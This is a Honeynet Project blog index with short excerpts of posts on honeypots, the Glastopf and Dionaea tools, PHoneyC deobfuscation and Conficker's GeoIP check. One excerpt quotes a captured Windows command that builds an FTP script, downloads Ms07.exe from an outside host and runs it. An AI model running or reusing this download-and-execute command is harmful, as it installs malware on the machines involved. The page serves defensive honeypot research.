To learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned.

Blogs

Spanish Chapter Status Report For 2008

ORGANIZATION
The Spanish Honeynet Project chapter primary areas of interest and development are wireless honeynets, web honeypots, data collecting and analyzing and research technical papers to inform the community. Our current members are:

Glastopf's new vulnerability emulator

The number of attacks against the Webhoneypot depends strongly on his PHP parser. So keeping the pattern matching mechanism up to date was one of the major future works. One of my goals for the Google Summer of Code time is to improve the parser and to reduce upcoming changes in attack patterns. The old parser was very simple: collect all lines containing echo calls, look for known patterns and generate the appropriate response.

Iteolih: If you can't touch it ...

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.

cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe

Visualization Experiments

Most of my work in the past few weeks has been focusing on the visualization aspect of the project.  One thing that I am trying to avoid is simply making graphs/charts and that sort of visualization.  Those sorts of things are incredibly useful since anyone can understand them, on the other hand they're trivial to make.  I've been making a few basic visualizations, but the two that, so far, have the most merit are delinating the events based on color (each group of events is a separate color) and the other separates them based on height (each y position is a different event).  I'll admi

A review to what we have done yet

Our work mainly focuses on DOM simulation. I believe the following is the most important for deobfuscation, but we also do lot more so that our program can handle normal web pages. We will not list them here.
Our code can be found at:
http://code.google.com/p/phoneyc/source/browse/phoneyc#phoneyc/branches/phoneyc_wanggeng
1. DOM tree generation.

Iteolih: SMB/RPC efforts

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).

SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.

Conficker.A going down?

Conficker contains a piece of code that has been object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it performs a lookup against Maxmind's GeoIP database, which is freely available, and skips the host if the returned country code is UA. While the B variant comes with a copy of the database embedded, the A variant downloads the file from Maxmind's server. A couple of days ago Felix had the idea to deliver a specially crafted database that maps every IP address to the Ukrain.

What's new on phoneyc (3)--- Mid-term Evaluation

 

Mid-term Report on PHoneyC GSoC project 1

Info: See <https://www.honeynet.org/gsoc/project1> for
project details.
Author: Zhijie Chen (Joyan) <czj.pub@gmail.com>
Mentor: Jose Nazario
Description: Mid-term Report on PHoneyC GSoC project 1. This report
describes what I have done on the PHoneyC's libemu integration
for shellcode and heapspray detection during the first half of
the GSoC. Till now, the main ideas on this feature has been
fast-implemented (actually I mean poor coding style) and the
whole flow works well, with some code rewriting and performance
optimization needed in the future.

Tracking Intelligence Project

What is TIP? TIP stands for Tracking Intelligence Project. In my most beautiful dreams, TIP should be an information gathering
framework whose purpose is to autonomously collect Internet threat
trends. It's entirely written in Python using Twisted and bound to the Django framework in order to abstract the underlying database and to easily build a web interface to the data.

Confusion About Honeypots

Honeypots have been actively used by the security community for over ten years now.  They are used for a variety of purposes, but now a days primarily for information gathering.   When honeypots first were being used they generated a great deal of discussion about the legal issues.  However, through the years this debate has died down, most organizations feeling these issues are minor.  I just wanted to share an update on these thoughts.
 

Syndicate content